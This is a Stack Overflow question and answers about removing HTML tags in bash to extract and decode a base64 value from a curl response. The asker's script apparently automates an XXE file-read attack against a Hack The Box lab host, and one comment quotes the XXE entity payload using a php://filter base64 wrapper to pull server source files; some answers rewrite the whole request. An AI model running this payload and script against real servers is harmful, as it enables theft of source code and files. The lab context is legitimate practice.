How can I remove HTML from a string in bash?

Question

I am trying to remove the <td> and </td> from a curl output. The output gives a table view that looks like this:

If DB were ready, would have added:
<table>
  <tr>
    <td>Title:</td>
    <td>dsf</td>
  </tr>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
  <tr>
    <td>Score:</td>
    <td>fdsf</td>
  </tr>
  <tr>
    <td>Reward:</td>
    <td>dsfsdf</td>
  </tr>
</table>

Under the CWE: column is some base64 I want to decode. Here is what I have tried:

#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file

# sed: -e expression #1, char 9: unknown option to `s'
cat file | grep "<td>" | sed 's/<td>//g'| sed 's/</td>//g' | sed '1,3d' | sed '2,5d' | tr -d " "

Only, I keep getting

sed: -e expression #1, char 9: unknown option to `s'

on the cat file line.

Update: Using xmllint

#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file
xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file|sed '1,1d')

Gives me this:

warning: failed to load external entity "<table>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Title:</td>"
warning: failed to load external entity "<td>dsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>CWE:</td>"
warning: failed to load external entity "<td>BASE 64 WOULD BE HERE</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Score:</td>"
warning: failed to load external entity "<td>fdsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Reward:</td>"
warning: failed to load external entity "<td>dsfsdf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "</table>"

Update more:

curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | sed '1, 1d' | xmllint --html --xpath /table/tbody/tr[2]/td[2] -

XPath set is empty

Do you have a compelling reason not to use HTML-aware tools for this? Python has HTML-aware libraries such as lxml, and modern Linux distros include xmllint and similar tools that can be run from the command line. See, for example, "xmllint to parse a html file".
– Charles Duffy, Commented Aug 12, 2021 at 17:21
xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file) isn't working @CharlesDuffy
– Jaquarh, Commented Aug 12, 2021 at 17:30
$(cat file)? Of course it wouldn't work -- that reads your input file, breaks it into individual command line arguments and puts them on xmllint's command line. Why would you ever want to do that? Use the linked question's answers the way it says to use them, don't make up your own broken thing and then ask why it's broken.
– Charles Duffy, Commented Aug 12, 2021 at 17:31
Don't parse XML/HTML with regex. I suggest using an XML/HTML parser (xmlstarlet, xmllint ...).
– Cyrus, Commented Aug 12, 2021 at 17:33
While we've got some sample input (If DB were ready ... </table>), we don't have the matching expected output; please update the question with the expected output.
– markp-fuso, Commented Aug 12, 2021 at 17:33
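
The word splitting described in the comments above can be reproduced without xmllint. The following is a minimal sketch, assuming a throwaway sample file created with mktemp; the count_args helper and the variable names are made up for illustration and are not part of the question.

```shell
#!/bin/bash
# Hypothetical sample file standing in for the saved curl output.
sample=$(mktemp)
printf '%s\n' '<table>' '  <tr>' '    <td>CWE:</td>' '  </tr>' '</table>' > "$sample"

# Illustrative helper: report how many arguments it received.
count_args() { echo "$#"; }

# Unquoted command substitution: the shell splits the file contents on
# whitespace, so every token becomes a separate argument.
unquoted=$(count_args $(cat "$sample"))

# Passing the file name instead hands the tool exactly one argument.
by_name=$(count_args "$sample")

echo "unquoted: $unquoted argument(s), by name: $by_name argument(s)"
rm -f "$sample"
```

This is consistent with the warnings in the question: xmllint received each token as if it were a separate file name to load.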

markp-fuso · Accepted Answer · 2021-08-12 17:58:09Z

2

Addressing the (original) issue of the sed error:

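sed 's/</td>//g'
This uses / as the delimiter, but / is also part of the string to be replaced.
Net result: sed reads < as the pattern and td> as the replacement, then fails on the leftover /g, which it tries to interpret as flags (hence "unknown option to `s'" at char 9).
Either switch to another delimiter that doesn't show up in the data (e.g., |) or escape the / in the pattern (e.g., <\/td>).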
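
Both fixes can be tried on a single row from the question's table. This is only a sketch; the variable names are illustrative, and the sample line is copied from the question.

```shell
#!/bin/bash
# One sample row, as in the question's table.
line='    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>'

# Option 1: use | as the delimiter so the / in </td> needs no escaping.
with_pipe=$(printf '%s\n' "$line" | sed 's|<td>||g' | sed 's|</td>||g' | tr -d ' ')

# Option 2: keep / as the delimiter and escape the / inside the pattern.
with_escape=$(printf '%s\n' "$line" | sed -e 's/<td>//g' -e 's/<\/td>//g' | tr -d ' ')

echo "$with_pipe"
echo "$with_escape"
```

Either form leaves only the cell text, with the tags and the indentation removed.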

As for the bigger picture (parsing out the CWE: value) ...

Assuming an HTML-aware tool is not available, there's only one CWE: in the input, and the input is nicely formatted as shown, replace the cat/grep/sed/sed/sed/sed/tr mess and let awk do the work, eg:

awk -F'[<>]' '$3 ~ "CWE:" {printme=1;next} printme {print $3; exit}' file

This generates:

SSBBTSBTT01FIEJBU0U2NAo=
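
To see why $3 holds the cell text, and to finish the decode step the question asks about, here is a small self-contained sketch. It assumes GNU coreutils base64 (where -d means decode) and recreates part of the question's sample in a temporary file; the variable names are illustrative.

```shell
#!/bin/bash
# Recreate the sample response from the question in a temporary file.
file=$(mktemp)
cat > "$file" <<'EOF'
If DB were ready, would have added:
<table>
  <tr>
    <td>Title:</td>
    <td>dsf</td>
  </tr>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
</table>
EOF

# With -F'[<>]' a line like "    <td>CWE:</td>" splits into
# $1="    ", $2="td", $3="CWE:", $4="/td", so $3 is the cell text.
# The flag is set on the CWE: row and the next row's $3 is printed.
encoded=$(awk -F'[<>]' '$3 ~ "CWE:" {printme=1; next} printme {print $3; exit}' "$file")

# Decode the extracted cell.
decoded=$(printf '%s' "$encoded" | base64 -d)

echo "$encoded"
echo "$decoded"
rm -f "$file"
```

This relies on the same assumptions as the awk command above: one CWE: row, and one cell per line.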

edited Aug 12, 2021 at 17:58

answered Aug 12, 2021 at 17:50

markp-fuso

8 Comments

Charles Duffy Over a year ago

Using a syntax-unaware tool to "parse" a list of security vulnerabilities is rich.

Jaquarh Over a year ago

Thank you!! My XXE uses php:// filter to generate base64 encoded source files from the server: <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=./PLACEHOLDER" >]> so I can now automatically just scrape the source code! I appreciate it!

markp-fuso Over a year ago

@CharlesDuffy uh, yep, and if OP is lucky it'll never bite 'em in the arse :-)

Jaquarh Over a year ago

It's a Hack The Box lab, not the real world. I just like to automate my tools for the writeups @markp-fuso

Charles Duffy Over a year ago

@Jaquarh, ...point of a lab is to teach you skills you can use in the real world, though.

Pierre François · Accepted Answer · 2021-08-13 13:51:25Z

2

To extract data from HTML files (assuming the input is well-formed XML), try this one-liner instead. The trailing - tells xmllint to read the document from standard input:

curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | xmllint --xpath '//td[text() = "CWE:"]/following-sibling::td/text()' - | base64 -d
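
The sample response in the question starts with a plain-text line, so it is not well-formed XML as it stands. A hedged variant, assuming xmllint from libxml2 is installed, is to let its HTML parser handle the input with --html. The sketch below uses a hard-coded copy of the sample rather than the live curl call, and the variable names are illustrative.

```shell
#!/bin/bash
# Sample response from the question, including the leading non-HTML line.
response='If DB were ready, would have added:
<table>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
</table>'

if command -v xmllint >/dev/null 2>&1; then
  # --html tolerates the stray first line; "-" reads from stdin.
  # The // search does not depend on the html/body wrapper that the
  # HTML parser adds around the table.
  decoded=$(printf '%s\n' "$response" |
    xmllint --html --xpath '//td[text()="CWE:"]/following-sibling::td/text()' - 2>/dev/null |
    base64 -d)
  echo "$decoded"
else
  echo "xmllint not installed; skipping" >&2
fi
```

The html/body wrapper is also a plausible reason the question's absolute path /table/tbody/tr[2]/td[2] returned an empty set: under --html the table is no longer the root element, and the sample markup contains no tbody.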

edited Aug 13, 2021 at 13:51

answered Aug 12, 2021 at 18:00

Pierre François

Reino · Accepted Answer · 2021-08-14 22:21:19Z

Please don't use RegEx to parse HTML, but use an HTML parser like xidel instead.

The final bit, extracting and decoding the base64 string:

$ xidel -s file -e '
  //td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'
I AM SOME BASE64

Despite not knowing the content of your 'xxe.txt', xidel can probably also do all those steps for you:

$ xidel -s \
  -d 'data={file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>"))}' \
  "http://10.10.11.100/tracker_diRbPr00f314.php" \
  -e '//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))'

or

$ xidel -se '
  x:request({
    "post":"data="||file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>")),
    "url":"http://10.10.11.100/tracker_diRbPr00f314.php"
  })/doc//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'
